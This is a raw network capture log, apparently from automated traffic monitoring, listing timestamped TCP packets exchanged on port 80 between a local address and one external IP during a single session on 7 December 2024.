Dec 7, 2024 10:51:54.668664932 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.668694019 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.668757915 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.669483900 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.669574976 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.669591904 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.669692039 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.670350075 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.670453072 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.670478106 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.670577049 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.671252012 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.671371937 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.671576977 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.672194958 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.672267914 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.672333956 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.672619104 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.673122883 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.673214912 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.673239946 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.673350096 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.673994064 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.674122095 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.674132109 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.674226999 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.674853086 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.674968958 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.674989939 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.675086975 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.675843000 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.675889015 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.675909042 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.676132917 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.676745892 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.676870108 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.676897049 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.677076101 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.677606106 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.677686930 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.677709103 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.677844048 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.678539991 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.678663969 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.678695917 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.678786993 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.679691076 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.679706097 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.679781914 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.680908918 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.680948973 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.680979013 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.681019068 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.681657076 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.681749105 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.681777000 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.681870937 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.682492018 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.682565928 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.682822943 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.683204889 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.683232069 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.683259010 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.683275938 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.683978081 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.684119940 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.684165955 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.684319019 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.684861898 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.684952974 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.684984922 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.685174942 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.685825109 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.685911894 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.686000109 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.686121941 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.686877012 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.686935902 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.686969042 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.687077045 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.687608004 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.687727928 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.687738895 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.687808990 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.688483000 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.688599110 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.688906908 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.689388990 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.689507008 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.689508915 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.689568043 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.690299988 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.690427065 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.690459013 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.690536022 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.691245079 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.691376925 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.691405058 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.691576004 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.692101002 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.692223072 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.692251921 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.692317963 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.692991972 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.693171024 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.727658987 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.727744102 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.727782011 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.727879047 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.728090048 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.728215933 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.728245020 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.728501081 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.729027987 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.729085922 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.729142904 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.729265928 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.729978085 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.730000019 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.730047941 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.730047941 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.730952978 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.731060028 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.731137037 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.731216908 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.731827021 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.731962919 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.731990099 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.732151985 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.732702017 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.732772112 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.732814074 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.733047009 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.733671904 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.733741045 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.733778954 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.733805895 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.734644890 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.734796047 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.734816074 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.734935999 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.735410929 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.735486984 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.735507011 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.735574961 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.736290932 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.736438036 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.793365955 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.793420076 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.793486118 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.793486118 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.793736935 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.793829918 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.793857098 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.794092894 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.794619083 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.794725895 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.794730902 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.794833899 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.795552015 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.795639992 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.795656919 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.795821905 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.796469927 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.796529055 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.796582937 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.796684027 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.797379017 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.797439098 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.797466040 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.797663927 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.798257113 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.798309088 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.798336029 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.798614025 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.799170971 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.799258947 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.799283981 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.799307108 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.800065994 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.800127029 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.800164938 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.800426960 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.801031113 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.801120996 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.801192999 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.801299095 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.801872015 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.802032948 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.855739117 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.855823994 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.856129885 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.856165886 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.856199980 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.856451035 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.856899023 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.856983900 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.857013941 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.857779026 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.857863903 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.857887983 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.858108997 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.858709097 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.858819008 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.858829021 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.858927965 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.859569073 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.859615088 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.859639883 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.859822989 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.860580921 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.860749006 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.860774994 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.860867977 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.861377954 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.861433029 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.861527920 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.861687899 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.862277031 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.862442970 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.862464905 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.862590075 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.863356113 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.863415003 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.863441944 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.863627911 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.864125013 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.864237070 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.864268064 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.864316940 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.865103960 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.865205050 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.865211964 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.865356922 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.935643911 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.055413961 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.378391981 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.378446102 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.378468990 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.378495932 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.378634930 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.378777027 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.378803015 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.378842115 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.379518986 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.379578114 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.379607916 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.379646063 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.380171061 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.380213976 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.380261898 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.380297899 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.381098986 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.381156921 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.381217003 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.381263018 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.381975889 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.382075071 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.382101059 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.382116079 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.382926941 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.382978916 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.383018017 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.383057117 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.383805990 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.383874893 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.383909941 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.383946896 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.384725094 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.384768963 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.384814024 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.384852886 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.385617018 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.385657072 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.385699034 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.385763884 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.386573076 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.386615992 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.386701107 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.386748075 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.387415886 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.387465000 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.387552023 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.387598038 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.388325930 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.388366938 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.388432980 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.388566971 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.389291048 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.389332056 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.389406919 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.389458895 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.390299082 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.390364885 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.390496969 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.390535116 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.391344070 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.391401052 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.391544104 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.391588926 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.392297983 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.392318010 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.392349958 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.392388105 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.393023968 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.393064022 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.393126011 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.393279076 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.393767118 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.393810034 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.393867016 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.393907070 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.394750118 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.394790888 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.394795895 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.394830942 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.395587921 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.395641088 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.395679951 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.395792007 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.396482944 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.396536112 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.396605015 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.396645069 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.397449970 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.397524118 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.397572041 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.398401022 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.398457050 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.398577929 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.398648024 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.399189949 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.399245977 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.399293900 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.399404049 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.400173903 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.400226116 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.400290012 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:55.400331974 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:55.401031017 CET	80	49808	185.215.113.206	192.168.2.6
